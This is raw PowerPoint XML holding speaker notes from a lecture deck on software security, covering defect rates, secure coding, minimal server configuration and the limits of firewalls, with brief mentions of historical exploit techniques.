        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1129080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1F700EC7-489E-3C4D-9BE0-87C71032D19C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1658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5891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255572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A05C8BEE-508B-7946-A3C8-63B4FF62A16D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167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7939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modifying inetd.conf will be noticed by most system administrators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358563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F90E2A3A-1A12-D44E-98C2-C09A0435F8A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is the technique e-eye used in its IIS exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This technique could be used on Windows or UNIX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341036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9680D2A8-15F6-D74B-8A9D-68AFC3C3A384}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172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2035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is a recurring theme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172572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2B405B94-7B17-5248-8AFF-C150F8D7742F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174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4083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" marR="0" lvl="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34589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DD8E614F-050D-F542-8736-4BC557CD047A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177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7155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>You have to train your developers to write secure code. It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s not easy, but it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s important.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870707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3DC9D356-ABFD-154F-B3E0-FC44690EDF34}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187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8787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Your Internet accessible servers must have a minimal configuration. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Also, only let such servers respond to incoming traffic, and never originate traffic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102185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240A3F5D-ED28-CA4F-AA61-48D73D675D78}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>According the CERT Coordination Center, more than 90% of software security incidents are caused by attackers exploiting known software defect types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>How many defects are there? Most operating systems and commercial software applications are known to have more than 2 defects per KSLOC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Source lines of code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SLOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>), or 2000+ defects per million SLOC. Even if only 5% of these defects are potential security concerns, there are 100 vulnerabilities per million SLOC. So, for Windows 2K (29+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>milions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>), that would be 60,000 defects and 3,000 security related defects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804864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B398C82C-1440-CB4F-BB3E-276952D86C25}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180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0227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="509120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0CA48D6A-84FE-8B40-AA68-CF50480400BD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2426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2691"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32060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C6CC113F-9AF7-8443-8763-2CC50D8738F3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2539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3955"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3664827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507DB9E0-1B2E-AD41-AA6D-7DD4A2CBDBD8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2549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4979"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2766006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321E96D8-13C5-A64D-9C30-D5F5F226F03D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2570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7027"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3432584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97858693-5F4D-154F-9D8F-641D183208D3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2580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8051"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3315482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5C2208D4-A99B-184B-8321-7A5ED6A14DA9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2590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9075"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77038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86729029-B8B0-8146-96E0-32FA6A4CC255}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2713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1363"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3408812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36FE5A7C-C70E-EF43-A176-2BD35E04DC88}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2734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3411"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2694826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7E823F61-9EAD-E449-940F-7087AC433219}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2754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5459"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218509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0F911542-73C5-224C-BA6F-2BEC89CE2B7B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161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1795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>External security measures are important, but don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>t think your company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s essential software applications – and the critical and confidential information they contain on your clients, employees, and finances – are secure just because you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> got a firewall and antivirus protection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Firewalls and antivirus are software and come with their own bugs and glitches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. Combined with the fact that your firewall must by definition allow for external access to your applications, this means that even the best firewall is porous and the software it protects is susceptible to attack.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Since applications are typically not built with security in mind, the threat of business-crippling damage done by someone is real. That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s why true corporate security includes taking the extra steps necessary to provide for software security during the earliest stages of software development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Software requirements should be driven by business requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> with an understanding of the necessary trade-offs between technology and business goals. Developers may be tempted to add lots of bells and whistles, but it all just amounts to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>feature overload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> if the final product does not adequately address the end user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s needs. It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s a widely recognized fact that misunderstood or unmet business requirements are among the leading causes of software project failure. Software developers often add the latest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> features, increasing software complexity. Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>studies have shown that most users rely on less than 10% of the features of common programs such as Microsoft Word or Netscape Communicator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>These properties must be designed into the software from the ground up and thoroughly tested throughout the development lifecycle. The earlier in the development cycle properties such as security, reliability, and safety are addressed, the lower the development costs and the greater the likelihood that the final product will function as expected with no unintended consequences.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249027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300447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977968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855960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654543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82560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336470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40874733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0684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8BBD8B89-9F15-EA42-A654-6FE9AE2B8BE3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
